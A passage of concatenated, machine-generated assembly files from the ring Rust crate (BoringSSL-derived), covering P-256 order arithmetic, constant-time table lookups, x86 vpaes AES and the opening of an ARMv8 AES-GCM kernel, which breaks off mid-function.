adcs x17,x19,x24
adc x19,x20,xzr
adds x14,x14,x8 // accumulate low parts
umulh x8,x4,x3
adcs x15,x15,x9
umulh x9,x5,x3
adcs x16,x16,x10
umulh x10,x6,x3
adcs x17,x17,x11
umulh x11,x7,x3
adc x19,x19,xzr
mul x24,x14,x23
adds x15,x15,x8 // accumulate high parts
adcs x16,x16,x9
adcs x17,x17,x10
adcs x19,x19,x11
adc x20,xzr,xzr
ldr x3,[x2,#8*2] // b[i]
lsl x8,x24,#32
subs x16,x16,x24
lsr x9,x24,#32
sbcs x17,x17,x8
sbcs x19,x19,x9
sbc x20,x20,xzr
subs xzr,x14,#1
umulh x9,x12,x24
mul x10,x13,x24
umulh x11,x13,x24
adcs x10,x10,x9
mul x8,x4,x3
adc x11,x11,xzr
mul x9,x5,x3
adds x14,x15,x10
mul x10,x6,x3
adcs x15,x16,x11
mul x11,x7,x3
adcs x16,x17,x24
adcs x17,x19,x24
adc x19,x20,xzr
adds x14,x14,x8 // accumulate low parts
umulh x8,x4,x3
adcs x15,x15,x9
umulh x9,x5,x3
adcs x16,x16,x10
umulh x10,x6,x3
adcs x17,x17,x11
umulh x11,x7,x3
adc x19,x19,xzr
mul x24,x14,x23
adds x15,x15,x8 // accumulate high parts
adcs x16,x16,x9
adcs x17,x17,x10
adcs x19,x19,x11
adc x20,xzr,xzr
ldr x3,[x2,#8*3] // b[i]
lsl x8,x24,#32
subs x16,x16,x24
lsr x9,x24,#32
sbcs x17,x17,x8
sbcs x19,x19,x9
sbc x20,x20,xzr
subs xzr,x14,#1
umulh x9,x12,x24
mul x10,x13,x24
umulh x11,x13,x24
adcs x10,x10,x9
mul x8,x4,x3
adc x11,x11,xzr
mul x9,x5,x3
adds x14,x15,x10
mul x10,x6,x3
adcs x15,x16,x11
mul x11,x7,x3
adcs x16,x17,x24
adcs x17,x19,x24
adc x19,x20,xzr
adds x14,x14,x8 // accumulate low parts
umulh x8,x4,x3
adcs x15,x15,x9
umulh x9,x5,x3
adcs x16,x16,x10
umulh x10,x6,x3
adcs x17,x17,x11
umulh x11,x7,x3
adc x19,x19,xzr
mul x24,x14,x23
adds x15,x15,x8 // accumulate high parts
adcs x16,x16,x9
adcs x17,x17,x10
adcs x19,x19,x11
adc x20,xzr,xzr
lsl x8,x24,#32 // last reduction
subs x16,x16,x24
lsr x9,x24,#32
sbcs x17,x17,x8
sbcs x19,x19,x9
sbc x20,x20,xzr
subs xzr,x14,#1
umulh x9,x12,x24
mul x10,x13,x24
umulh x11,x13,x24
adcs x10,x10,x9
adc x11,x11,xzr
adds x14,x15,x10
adcs x15,x16,x11
adcs x16,x17,x24
adcs x17,x19,x24
adc x19,x20,xzr
subs x8,x14,x12 // ret -= modulus
sbcs x9,x15,x13
sbcs x10,x16,x21
sbcs x11,x17,x22
sbcs xzr,x19,xzr
csel x14,x14,x8,lo // ret = borrow ? ret : ret-modulus
csel x15,x15,x9,lo
csel x16,x16,x10,lo
stp x14,x15,[x0]
csel x17,x17,x11,lo
stp x16,x17,[x0,#16]
ldp x19,x20,[sp,#16]
ldp x21,x22,[sp,#32]
ldp x23,x24,[sp,#48]
ldr x29,[sp],#64
ret
.size ecp_nistz256_ord_mul_mont,.-ecp_nistz256_ord_mul_mont
////////////////////////////////////////////////////////////////////////
// void ecp_nistz256_ord_sqr_mont(uint64_t res[4], uint64_t a[4],
// uint64_t rep);
.globl ecp_nistz256_ord_sqr_mont
.hidden ecp_nistz256_ord_sqr_mont
.type ecp_nistz256_ord_sqr_mont,%function
.align 4
ecp_nistz256_ord_sqr_mont:
AARCH64_VALID_CALL_TARGET
// Armv8.3-A PAuth: even though x30 is pushed to stack it is not popped later.
stp x29,x30,[sp,#-64]!
add x29,sp,#0
stp x19,x20,[sp,#16]
stp x21,x22,[sp,#32]
stp x23,x24,[sp,#48]
adrp x23,.Lord
add x23,x23,:lo12:.Lord
ldp x4,x5,[x1]
ldp x6,x7,[x1,#16]
ldp x12,x13,[x23,#0]
ldp x21,x22,[x23,#16]
ldr x23,[x23,#32]
b .Loop_ord_sqr
.align 4
.Loop_ord_sqr:
sub x2,x2,#1
////////////////////////////////////////////////////////////////
// | | | | | |a1*a0| |
// | | | | |a2*a0| | |
// | |a3*a2|a3*a0| | | |
// | | | |a2*a1| | | |
// | | |a3*a1| | | | |
// *| | | | | | | | 2|
// +|a3*a3|a2*a2|a1*a1|a0*a0|
// |--+--+--+--+--+--+--+--|
	// |A7|A6|A5|A4|A3|A2|A1|A0|, where Ax denotes the 64-bit accumulator limb acc[x].
//
// "can't overflow" below mark carrying into high part of
// multiplication result, which can't overflow, because it
// can never be all ones.
mul x15,x5,x4 // a[1]*a[0]
umulh x9,x5,x4
mul x16,x6,x4 // a[2]*a[0]
umulh x10,x6,x4
mul x17,x7,x4 // a[3]*a[0]
umulh x19,x7,x4
adds x16,x16,x9 // accumulate high parts of multiplication
mul x8,x6,x5 // a[2]*a[1]
umulh x9,x6,x5
adcs x17,x17,x10
mul x10,x7,x5 // a[3]*a[1]
umulh x11,x7,x5
adc x19,x19,xzr // can't overflow
mul x20,x7,x6 // a[3]*a[2]
umulh x1,x7,x6
adds x9,x9,x10 // accumulate high parts of multiplication
mul x14,x4,x4 // a[0]*a[0]
adc x10,x11,xzr // can't overflow
adds x17,x17,x8 // accumulate low parts of multiplication
umulh x4,x4,x4
adcs x19,x19,x9
mul x9,x5,x5 // a[1]*a[1]
adcs x20,x20,x10
umulh x5,x5,x5
adc x1,x1,xzr // can't overflow
adds x15,x15,x15 // acc[1-6]*=2
mul x10,x6,x6 // a[2]*a[2]
adcs x16,x16,x16
umulh x6,x6,x6
adcs x17,x17,x17
mul x11,x7,x7 // a[3]*a[3]
adcs x19,x19,x19
umulh x7,x7,x7
adcs x20,x20,x20
adcs x1,x1,x1
adc x3,xzr,xzr
adds x15,x15,x4 // +a[i]*a[i]
mul x24,x14,x23
adcs x16,x16,x9
adcs x17,x17,x5
adcs x19,x19,x10
adcs x20,x20,x6
adcs x1,x1,x11
adc x3,x3,x7
subs xzr,x14,#1
umulh x9,x12,x24
mul x10,x13,x24
umulh x11,x13,x24
adcs x10,x10,x9
adc x11,x11,xzr
adds x14,x15,x10
adcs x15,x16,x11
adcs x16,x17,x24
adc x17,xzr,x24 // can't overflow
mul x11,x14,x23
lsl x8,x24,#32
subs x15,x15,x24
lsr x9,x24,#32
sbcs x16,x16,x8
sbc x17,x17,x9 // can't borrow
subs xzr,x14,#1
umulh x9,x12,x11
mul x10,x13,x11
umulh x24,x13,x11
adcs x10,x10,x9
adc x24,x24,xzr
adds x14,x15,x10
adcs x15,x16,x24
adcs x16,x17,x11
adc x17,xzr,x11 // can't overflow
mul x24,x14,x23
lsl x8,x11,#32
subs x15,x15,x11
lsr x9,x11,#32
sbcs x16,x16,x8
sbc x17,x17,x9 // can't borrow
subs xzr,x14,#1
umulh x9,x12,x24
mul x10,x13,x24
umulh x11,x13,x24
adcs x10,x10,x9
adc x11,x11,xzr
adds x14,x15,x10
adcs x15,x16,x11
adcs x16,x17,x24
adc x17,xzr,x24 // can't overflow
mul x11,x14,x23
lsl x8,x24,#32
subs x15,x15,x24
lsr x9,x24,#32
sbcs x16,x16,x8
sbc x17,x17,x9 // can't borrow
subs xzr,x14,#1
umulh x9,x12,x11
mul x10,x13,x11
umulh x24,x13,x11
adcs x10,x10,x9
adc x24,x24,xzr
adds x14,x15,x10
adcs x15,x16,x24
adcs x16,x17,x11
adc x17,xzr,x11 // can't overflow
lsl x8,x11,#32
subs x15,x15,x11
lsr x9,x11,#32
sbcs x16,x16,x8
sbc x17,x17,x9 // can't borrow
adds x14,x14,x19 // accumulate upper half
adcs x15,x15,x20
adcs x16,x16,x1
adcs x17,x17,x3
adc x19,xzr,xzr
subs x8,x14,x12 // ret -= modulus
sbcs x9,x15,x13
sbcs x10,x16,x21
sbcs x11,x17,x22
sbcs xzr,x19,xzr
csel x4,x14,x8,lo // ret = borrow ? ret : ret-modulus
csel x5,x15,x9,lo
csel x6,x16,x10,lo
csel x7,x17,x11,lo
cbnz x2,.Loop_ord_sqr
stp x4,x5,[x0]
stp x6,x7,[x0,#16]
ldp x19,x20,[sp,#16]
ldp x21,x22,[sp,#32]
ldp x23,x24,[sp,#48]
ldr x29,[sp],#64
ret
.size ecp_nistz256_ord_sqr_mont,.-ecp_nistz256_ord_sqr_mont
////////////////////////////////////////////////////////////////////////
// void ecp_nistz256_select_w5(uint64_t *val, uint64_t *in_t, int index);
.globl ecp_nistz256_select_w5
.hidden ecp_nistz256_select_w5
.type ecp_nistz256_select_w5,%function
.align 4
ecp_nistz256_select_w5:
AARCH64_VALID_CALL_TARGET
// x10 := x0
// w9 := 0; loop counter and incremented internal index
mov x10, x0
mov w9, #0
// [v16-v21] := 0
movi v16.16b, #0
movi v17.16b, #0
movi v18.16b, #0
movi v19.16b, #0
movi v20.16b, #0
movi v21.16b, #0
.Lselect_w5_loop:
// Loop 16 times.
// Increment index (loop counter); tested at the end of the loop
add w9, w9, #1
// [v22-v27] := Load a (3*256-bit = 6*128-bit) table entry starting at x1
// and advance x1 to point to the next entry
ld1 {v22.2d, v23.2d, v24.2d, v25.2d}, [x1],#64
// x11 := (w9 == w2)? All 1s : All 0s
cmp w9, w2
csetm x11, eq
// continue loading ...
ld1 {v26.2d, v27.2d}, [x1],#32
// duplicate mask_64 into Mask (all 0s or all 1s)
dup v3.2d, x11
	// [v16-v21] := (Mask == all 1s)? [v22-v27] : [v16-v21]
// i.e., values in output registers will remain the same if w9 != w2
bit v16.16b, v22.16b, v3.16b
bit v17.16b, v23.16b, v3.16b
bit v18.16b, v24.16b, v3.16b
bit v19.16b, v25.16b, v3.16b
bit v20.16b, v26.16b, v3.16b
bit v21.16b, v27.16b, v3.16b
	// If bit #4 is 0 (i.e. idx_ctr < 16) loop back
tbz w9, #4, .Lselect_w5_loop
// Write [v16-v21] to memory at the output pointer
st1 {v16.2d, v17.2d, v18.2d, v19.2d}, [x10],#64
st1 {v20.2d, v21.2d}, [x10]
ret
.size ecp_nistz256_select_w5,.-ecp_nistz256_select_w5
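// The scan above is the usual constant-time table lookup: every entry
// is read and an all-ones mask merges only the matching one. A hedged
// Python sketch of the same pattern (1-based index, as here):
//   def select(table, index):
//       acc = 0
//       for i, entry in enumerate(table, 1):
//           mask = -(i == index)              # 0 or -1 (all ones)
//           acc |= entry & mask
//       return acc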
////////////////////////////////////////////////////////////////////////
// void ecp_nistz256_select_w7(uint64_t *val, uint64_t *in_t, int index);
.globl ecp_nistz256_select_w7
.hidden ecp_nistz256_select_w7
.type ecp_nistz256_select_w7,%function
.align 4
ecp_nistz256_select_w7:
AARCH64_VALID_CALL_TARGET
// w9 := 0; loop counter and incremented internal index
mov w9, #0
	// [v16-v19] := 0
movi v16.16b, #0
movi v17.16b, #0
movi v18.16b, #0
movi v19.16b, #0
.Lselect_w7_loop:
// Loop 64 times.
// Increment index (loop counter); tested at the end of the loop
add w9, w9, #1
// [v22-v25] := Load a (2*256-bit = 4*128-bit) table entry starting at x1
// and advance x1 to point to the next entry
ld1 {v22.2d, v23.2d, v24.2d, v25.2d}, [x1],#64
// x11 := (w9 == w2)? All 1s : All 0s
cmp w9, w2
csetm x11, eq
// duplicate mask_64 into Mask (all 0s or all 1s)
dup v3.2d, x11
// [v16-v19] := (Mask == all 1s)? [v22-v25] : [v16-v19]
// i.e., values in output registers will remain the same if w9 != w2
bit v16.16b, v22.16b, v3.16b
bit v17.16b, v23.16b, v3.16b
bit v18.16b, v24.16b, v3.16b
bit v19.16b, v25.16b, v3.16b
	// If bit #6 is 0 (i.e. idx_ctr < 64) loop back
tbz w9, #6, .Lselect_w7_loop
// Write [v16-v19] to memory at the output pointer
st1 {v16.2d, v17.2d, v18.2d, v19.2d}, [x0]
ret
.size ecp_nistz256_select_w7,.-ecp_nistz256_select_w7
#endif // !OPENSSL_NO_ASM && defined(OPENSSL_AARCH64) && defined(__ELF__)
|
mi2bjss/Pressel-site | 9,958 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/vpaes-x86-elf.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_X86) && defined(__ELF__)
.text
#ifdef BORINGSSL_DISPATCH_TEST
#endif
.align 64
.L_vpaes_consts:
.long 218628480,235210255,168496130,67568393
.long 252381056,17041926,33884169,51187212
.long 252645135,252645135,252645135,252645135
.long 1512730624,3266504856,1377990664,3401244816
.long 830229760,1275146365,2969422977,3447763452
.long 3411033600,2979783055,338359620,2782886510
.long 4209124096,907596821,221174255,1006095553
.long 191964160,3799684038,3164090317,1589111125
.long 182528256,1777043520,2877432650,3265356744
.long 1874708224,3503451415,3305285752,363511674
.long 1606117888,3487855781,1093350906,2384367825
.long 197121,67569157,134941193,202313229
.long 67569157,134941193,202313229,197121
.long 134941193,202313229,197121,67569157
.long 202313229,197121,67569157,134941193
.long 33619971,100992007,168364043,235736079
.long 235736079,33619971,100992007,168364043
.long 168364043,235736079,33619971,100992007
.long 100992007,168364043,235736079,33619971
.long 50462976,117835012,185207048,252579084
.long 252314880,51251460,117574920,184942860
.long 184682752,252054788,50987272,118359308
.long 118099200,185467140,251790600,50727180
.long 2946363062,528716217,1300004225,1881839624
.long 1532713819,1532713819,1532713819,1532713819
.long 3602276352,4288629033,3737020424,4153884961
.long 1354558464,32357713,2958822624,3775749553
.long 1201988352,132424512,1572796698,503232858
.long 2213177600,1597421020,4103937655,675398315
.byte 86,101,99,116,111,114,32,80,101,114,109,117,116,97,116,105
.byte 111,110,32,65,69,83,32,102,111,114,32,120,56,54,47,83
.byte 83,83,69,51,44,32,77,105,107,101,32,72,97,109,98,117
.byte 114,103,32,40,83,116,97,110,102,111,114,100,32,85,110,105
.byte 118,101,114,115,105,116,121,41,0
.align 64
.hidden _vpaes_preheat
.type _vpaes_preheat,@function
.align 16
_vpaes_preheat:
addl (%esp),%ebp
movdqa -48(%ebp),%xmm7
movdqa -16(%ebp),%xmm6
ret
.size _vpaes_preheat,.-_vpaes_preheat
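// Note: the ".byte 102,15,56,0,..." runs below are hand-encoded SSSE3
// instructions: 66 0F 38 00 /r is pshufb xmm, xmm, so e.g.
// ".byte 102,15,56,0,208" is pshufb %xmm0,%xmm2 (and 102,15,58,15 is
// palignr). They are presumably emitted as raw bytes so the file
// assembles even with pre-SSSE3 toolchains.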
.hidden _vpaes_encrypt_core
.type _vpaes_encrypt_core,@function
.align 16
_vpaes_encrypt_core:
movl $16,%ecx
movl 240(%edx),%eax
movdqa %xmm6,%xmm1
movdqa (%ebp),%xmm2
pandn %xmm0,%xmm1
pand %xmm6,%xmm0
movdqu (%edx),%xmm5
.byte 102,15,56,0,208
movdqa 16(%ebp),%xmm0
pxor %xmm5,%xmm2
psrld $4,%xmm1
addl $16,%edx
.byte 102,15,56,0,193
leal 192(%ebp),%ebx
pxor %xmm2,%xmm0
jmp .L000enc_entry
.align 16
.L001enc_loop:
movdqa 32(%ebp),%xmm4
movdqa 48(%ebp),%xmm0
.byte 102,15,56,0,226
.byte 102,15,56,0,195
pxor %xmm5,%xmm4
movdqa 64(%ebp),%xmm5
pxor %xmm4,%xmm0
movdqa -64(%ebx,%ecx,1),%xmm1
.byte 102,15,56,0,234
movdqa 80(%ebp),%xmm2
movdqa (%ebx,%ecx,1),%xmm4
.byte 102,15,56,0,211
movdqa %xmm0,%xmm3
pxor %xmm5,%xmm2
.byte 102,15,56,0,193
addl $16,%edx
pxor %xmm2,%xmm0
.byte 102,15,56,0,220
addl $16,%ecx
pxor %xmm0,%xmm3
.byte 102,15,56,0,193
andl $48,%ecx
subl $1,%eax
pxor %xmm3,%xmm0
.L000enc_entry:
movdqa %xmm6,%xmm1
movdqa -32(%ebp),%xmm5
pandn %xmm0,%xmm1
psrld $4,%xmm1
pand %xmm6,%xmm0
.byte 102,15,56,0,232
movdqa %xmm7,%xmm3
pxor %xmm1,%xmm0
.byte 102,15,56,0,217
movdqa %xmm7,%xmm4
pxor %xmm5,%xmm3
.byte 102,15,56,0,224
movdqa %xmm7,%xmm2
pxor %xmm5,%xmm4
.byte 102,15,56,0,211
movdqa %xmm7,%xmm3
pxor %xmm0,%xmm2
.byte 102,15,56,0,220
movdqu (%edx),%xmm5
pxor %xmm1,%xmm3
jnz .L001enc_loop
movdqa 96(%ebp),%xmm4
movdqa 112(%ebp),%xmm0
.byte 102,15,56,0,226
pxor %xmm5,%xmm4
.byte 102,15,56,0,195
movdqa 64(%ebx,%ecx,1),%xmm1
pxor %xmm4,%xmm0
.byte 102,15,56,0,193
ret
.size _vpaes_encrypt_core,.-_vpaes_encrypt_core
.hidden _vpaes_schedule_core
.type _vpaes_schedule_core,@function
.align 16
_vpaes_schedule_core:
addl (%esp),%ebp
movdqu (%esi),%xmm0
movdqa 320(%ebp),%xmm2
movdqa %xmm0,%xmm3
leal (%ebp),%ebx
movdqa %xmm2,4(%esp)
call _vpaes_schedule_transform
movdqa %xmm0,%xmm7
testl %edi,%edi
jnz .L002schedule_am_decrypting
movdqu %xmm0,(%edx)
jmp .L003schedule_go
.L002schedule_am_decrypting:
movdqa 256(%ebp,%ecx,1),%xmm1
.byte 102,15,56,0,217
movdqu %xmm3,(%edx)
xorl $48,%ecx
.L003schedule_go:
cmpl $192,%eax
ja .L004schedule_256
.L005schedule_128:
movl $10,%eax
.L006loop_schedule_128:
call _vpaes_schedule_round
decl %eax
jz .L007schedule_mangle_last
call _vpaes_schedule_mangle
jmp .L006loop_schedule_128
.align 16
.L004schedule_256:
movdqu 16(%esi),%xmm0
call _vpaes_schedule_transform
movl $7,%eax
.L008loop_schedule_256:
call _vpaes_schedule_mangle
movdqa %xmm0,%xmm6
call _vpaes_schedule_round
decl %eax
jz .L007schedule_mangle_last
call _vpaes_schedule_mangle
pshufd $255,%xmm0,%xmm0
movdqa %xmm7,20(%esp)
movdqa %xmm6,%xmm7
call .L_vpaes_schedule_low_round
movdqa 20(%esp),%xmm7
jmp .L008loop_schedule_256
.align 16
.L007schedule_mangle_last:
leal 384(%ebp),%ebx
testl %edi,%edi
jnz .L009schedule_mangle_last_dec
movdqa 256(%ebp,%ecx,1),%xmm1
.byte 102,15,56,0,193
leal 352(%ebp),%ebx
addl $32,%edx
.L009schedule_mangle_last_dec:
addl $-16,%edx
pxor 336(%ebp),%xmm0
call _vpaes_schedule_transform
movdqu %xmm0,(%edx)
pxor %xmm0,%xmm0
pxor %xmm1,%xmm1
pxor %xmm2,%xmm2
pxor %xmm3,%xmm3
pxor %xmm4,%xmm4
pxor %xmm5,%xmm5
pxor %xmm6,%xmm6
pxor %xmm7,%xmm7
ret
.size _vpaes_schedule_core,.-_vpaes_schedule_core
.hidden _vpaes_schedule_round
.type _vpaes_schedule_round,@function
.align 16
_vpaes_schedule_round:
movdqa 8(%esp),%xmm2
pxor %xmm1,%xmm1
.byte 102,15,58,15,202,15
.byte 102,15,58,15,210,15
pxor %xmm1,%xmm7
pshufd $255,%xmm0,%xmm0
.byte 102,15,58,15,192,1
movdqa %xmm2,8(%esp)
.L_vpaes_schedule_low_round:
movdqa %xmm7,%xmm1
pslldq $4,%xmm7
pxor %xmm1,%xmm7
movdqa %xmm7,%xmm1
pslldq $8,%xmm7
pxor %xmm1,%xmm7
pxor 336(%ebp),%xmm7
movdqa -16(%ebp),%xmm4
movdqa -48(%ebp),%xmm5
movdqa %xmm4,%xmm1
pandn %xmm0,%xmm1
psrld $4,%xmm1
pand %xmm4,%xmm0
movdqa -32(%ebp),%xmm2
.byte 102,15,56,0,208
pxor %xmm1,%xmm0
movdqa %xmm5,%xmm3
.byte 102,15,56,0,217
pxor %xmm2,%xmm3
movdqa %xmm5,%xmm4
.byte 102,15,56,0,224
pxor %xmm2,%xmm4
movdqa %xmm5,%xmm2
.byte 102,15,56,0,211
pxor %xmm0,%xmm2
movdqa %xmm5,%xmm3
.byte 102,15,56,0,220
pxor %xmm1,%xmm3
movdqa 32(%ebp),%xmm4
.byte 102,15,56,0,226
movdqa 48(%ebp),%xmm0
.byte 102,15,56,0,195
pxor %xmm4,%xmm0
pxor %xmm7,%xmm0
movdqa %xmm0,%xmm7
ret
.size _vpaes_schedule_round,.-_vpaes_schedule_round
.hidden _vpaes_schedule_transform
.type _vpaes_schedule_transform,@function
.align 16
_vpaes_schedule_transform:
movdqa -16(%ebp),%xmm2
movdqa %xmm2,%xmm1
pandn %xmm0,%xmm1
psrld $4,%xmm1
pand %xmm2,%xmm0
movdqa (%ebx),%xmm2
.byte 102,15,56,0,208
movdqa 16(%ebx),%xmm0
.byte 102,15,56,0,193
pxor %xmm2,%xmm0
ret
.size _vpaes_schedule_transform,.-_vpaes_schedule_transform
.hidden _vpaes_schedule_mangle
.type _vpaes_schedule_mangle,@function
.align 16
_vpaes_schedule_mangle:
movdqa %xmm0,%xmm4
movdqa 128(%ebp),%xmm5
testl %edi,%edi
jnz .L010schedule_mangle_dec
addl $16,%edx
pxor 336(%ebp),%xmm4
.byte 102,15,56,0,229
movdqa %xmm4,%xmm3
.byte 102,15,56,0,229
pxor %xmm4,%xmm3
.byte 102,15,56,0,229
pxor %xmm4,%xmm3
jmp .L011schedule_mangle_both
.align 16
.L010schedule_mangle_dec:
movdqa -16(%ebp),%xmm2
leal (%ebp),%esi
movdqa %xmm2,%xmm1
pandn %xmm4,%xmm1
psrld $4,%xmm1
pand %xmm2,%xmm4
movdqa (%esi),%xmm2
.byte 102,15,56,0,212
movdqa 16(%esi),%xmm3
.byte 102,15,56,0,217
pxor %xmm2,%xmm3
.byte 102,15,56,0,221
movdqa 32(%esi),%xmm2
.byte 102,15,56,0,212
pxor %xmm3,%xmm2
movdqa 48(%esi),%xmm3
.byte 102,15,56,0,217
pxor %xmm2,%xmm3
.byte 102,15,56,0,221
movdqa 64(%esi),%xmm2
.byte 102,15,56,0,212
pxor %xmm3,%xmm2
movdqa 80(%esi),%xmm3
.byte 102,15,56,0,217
pxor %xmm2,%xmm3
.byte 102,15,56,0,221
movdqa 96(%esi),%xmm2
.byte 102,15,56,0,212
pxor %xmm3,%xmm2
movdqa 112(%esi),%xmm3
.byte 102,15,56,0,217
pxor %xmm2,%xmm3
addl $-16,%edx
.L011schedule_mangle_both:
movdqa 256(%ebp,%ecx,1),%xmm1
.byte 102,15,56,0,217
addl $-16,%ecx
andl $48,%ecx
movdqu %xmm3,(%edx)
ret
.size _vpaes_schedule_mangle,.-_vpaes_schedule_mangle
.globl vpaes_set_encrypt_key
.hidden vpaes_set_encrypt_key
.type vpaes_set_encrypt_key,@function
.align 16
vpaes_set_encrypt_key:
.L_vpaes_set_encrypt_key_begin:
pushl %ebp
pushl %ebx
pushl %esi
pushl %edi
#ifdef BORINGSSL_DISPATCH_TEST
pushl %ebx
pushl %edx
call .L012pic_for_function_hit
.L012pic_for_function_hit:
popl %ebx
leal BORINGSSL_function_hit+5-.L012pic_for_function_hit(%ebx),%ebx
movl $1,%edx
movb %dl,(%ebx)
popl %edx
popl %ebx
#endif
movl 20(%esp),%esi
leal -56(%esp),%ebx
movl 24(%esp),%eax
andl $-16,%ebx
movl 28(%esp),%edx
xchgl %esp,%ebx
movl %ebx,48(%esp)
movl %eax,%ebx
shrl $5,%ebx
addl $5,%ebx
movl %ebx,240(%edx)
movl $48,%ecx
movl $0,%edi
leal .L_vpaes_consts+0x30-.L013pic_point,%ebp
call _vpaes_schedule_core
.L013pic_point:
movl 48(%esp),%esp
xorl %eax,%eax
popl %edi
popl %esi
popl %ebx
popl %ebp
ret
.size vpaes_set_encrypt_key,.-.L_vpaes_set_encrypt_key_begin
.globl vpaes_encrypt
.hidden vpaes_encrypt
.type vpaes_encrypt,@function
.align 16
vpaes_encrypt:
.L_vpaes_encrypt_begin:
pushl %ebp
pushl %ebx
pushl %esi
pushl %edi
#ifdef BORINGSSL_DISPATCH_TEST
pushl %ebx
pushl %edx
call .L014pic_for_function_hit
.L014pic_for_function_hit:
popl %ebx
leal BORINGSSL_function_hit+4-.L014pic_for_function_hit(%ebx),%ebx
movl $1,%edx
movb %dl,(%ebx)
popl %edx
popl %ebx
#endif
leal .L_vpaes_consts+0x30-.L015pic_point,%ebp
call _vpaes_preheat
.L015pic_point:
movl 20(%esp),%esi
leal -56(%esp),%ebx
movl 24(%esp),%edi
andl $-16,%ebx
movl 28(%esp),%edx
xchgl %esp,%ebx
movl %ebx,48(%esp)
movdqu (%esi),%xmm0
call _vpaes_encrypt_core
movdqu %xmm0,(%edi)
movl 48(%esp),%esp
popl %edi
popl %esi
popl %ebx
popl %ebp
ret
.size vpaes_encrypt,.-.L_vpaes_encrypt_begin
#endif // !defined(OPENSSL_NO_ASM) && defined(OPENSSL_X86) && defined(__ELF__)
|
mi2bjss/Pressel-site | 82,152 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/aesv8-gcm-armv8-ios64.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_AARCH64) && defined(__APPLE__)
#if __ARM_MAX_ARCH__ >= 8
.text
.globl _aes_gcm_enc_kernel
.private_extern _aes_gcm_enc_kernel
.align 4
_aes_gcm_enc_kernel:
AARCH64_SIGN_LINK_REGISTER
stp x29, x30, [sp, #-128]!
mov x29, sp
stp x19, x20, [sp, #16]
mov x16, x4
mov x8, x5
stp x21, x22, [sp, #32]
stp x23, x24, [sp, #48]
stp d8, d9, [sp, #64]
stp d10, d11, [sp, #80]
stp d12, d13, [sp, #96]
stp d14, d15, [sp, #112]
ldr w17, [x8, #240]
add x19, x8, x17, lsl #4 // borrow input_l1 for last key
ldp x13, x14, [x19] // load round N keys
ldr q31, [x19, #-16] // load round N-1 keys
add x4, x0, x1, lsr #3 // end_input_ptr
lsr x5, x1, #3 // byte_len
mov x15, x5
ldp x10, x11, [x16] // ctr96_b64, ctr96_t32
	ld1	{ v0.16b}, [x16]	// special-case vector load of the initial counter so the first AES block can start as early as possible
sub x5, x5, #1 // byte_len - 1
ldr q18, [x8, #0] // load rk0
and x5, x5, #0xffffffffffffffc0 // number of bytes to be processed in main loop (at least 1 byte must be handled by tail)
ldr q25, [x8, #112] // load rk7
add x5, x5, x0
lsr x12, x11, #32
fmov d2, x10 // CTR block 2
orr w11, w11, w11
rev w12, w12 // rev_ctr32
fmov d1, x10 // CTR block 1
aese v0.16b, v18.16b
aesmc v0.16b, v0.16b // AES block 0 - round 0
add w12, w12, #1 // increment rev_ctr32
rev w9, w12 // CTR block 1
fmov d3, x10 // CTR block 3
orr x9, x11, x9, lsl #32 // CTR block 1
add w12, w12, #1 // CTR block 1
ldr q19, [x8, #16] // load rk1
fmov v1.d[1], x9 // CTR block 1
rev w9, w12 // CTR block 2
add w12, w12, #1 // CTR block 2
orr x9, x11, x9, lsl #32 // CTR block 2
ldr q20, [x8, #32] // load rk2
fmov v2.d[1], x9 // CTR block 2
rev w9, w12 // CTR block 3
aese v0.16b, v19.16b
aesmc v0.16b, v0.16b // AES block 0 - round 1
orr x9, x11, x9, lsl #32 // CTR block 3
fmov v3.d[1], x9 // CTR block 3
aese v1.16b, v18.16b
aesmc v1.16b, v1.16b // AES block 1 - round 0
ldr q21, [x8, #48] // load rk3
aese v0.16b, v20.16b
aesmc v0.16b, v0.16b // AES block 0 - round 2
ldr q24, [x8, #96] // load rk6
aese v2.16b, v18.16b
aesmc v2.16b, v2.16b // AES block 2 - round 0
ldr q23, [x8, #80] // load rk5
aese v1.16b, v19.16b
aesmc v1.16b, v1.16b // AES block 1 - round 1
ldr q14, [x6, #48] // load h3l | h3h
ext v14.16b, v14.16b, v14.16b, #8
aese v3.16b, v18.16b
aesmc v3.16b, v3.16b // AES block 3 - round 0
aese v2.16b, v19.16b
aesmc v2.16b, v2.16b // AES block 2 - round 1
ldr q22, [x8, #64] // load rk4
aese v1.16b, v20.16b
aesmc v1.16b, v1.16b // AES block 1 - round 2
ldr q13, [x6, #32] // load h2l | h2h
ext v13.16b, v13.16b, v13.16b, #8
aese v3.16b, v19.16b
aesmc v3.16b, v3.16b // AES block 3 - round 1
ldr q30, [x8, #192] // load rk12
aese v2.16b, v20.16b
aesmc v2.16b, v2.16b // AES block 2 - round 2
ldr q15, [x6, #80] // load h4l | h4h
ext v15.16b, v15.16b, v15.16b, #8
aese v1.16b, v21.16b
aesmc v1.16b, v1.16b // AES block 1 - round 3
ldr q29, [x8, #176] // load rk11
aese v3.16b, v20.16b
aesmc v3.16b, v3.16b // AES block 3 - round 2
ldr q26, [x8, #128] // load rk8
aese v2.16b, v21.16b
aesmc v2.16b, v2.16b // AES block 2 - round 3
add w12, w12, #1 // CTR block 3
aese v0.16b, v21.16b
aesmc v0.16b, v0.16b // AES block 0 - round 3
aese v3.16b, v21.16b
aesmc v3.16b, v3.16b // AES block 3 - round 3
ld1 { v11.16b}, [x3]
ext v11.16b, v11.16b, v11.16b, #8
rev64 v11.16b, v11.16b
aese v2.16b, v22.16b
aesmc v2.16b, v2.16b // AES block 2 - round 4
aese v0.16b, v22.16b
aesmc v0.16b, v0.16b // AES block 0 - round 4
aese v1.16b, v22.16b
aesmc v1.16b, v1.16b // AES block 1 - round 4
aese v3.16b, v22.16b
aesmc v3.16b, v3.16b // AES block 3 - round 4
cmp x17, #12 // setup flags for AES-128/192/256 check
aese v0.16b, v23.16b
aesmc v0.16b, v0.16b // AES block 0 - round 5
aese v1.16b, v23.16b
aesmc v1.16b, v1.16b // AES block 1 - round 5
aese v3.16b, v23.16b
aesmc v3.16b, v3.16b // AES block 3 - round 5
aese v2.16b, v23.16b
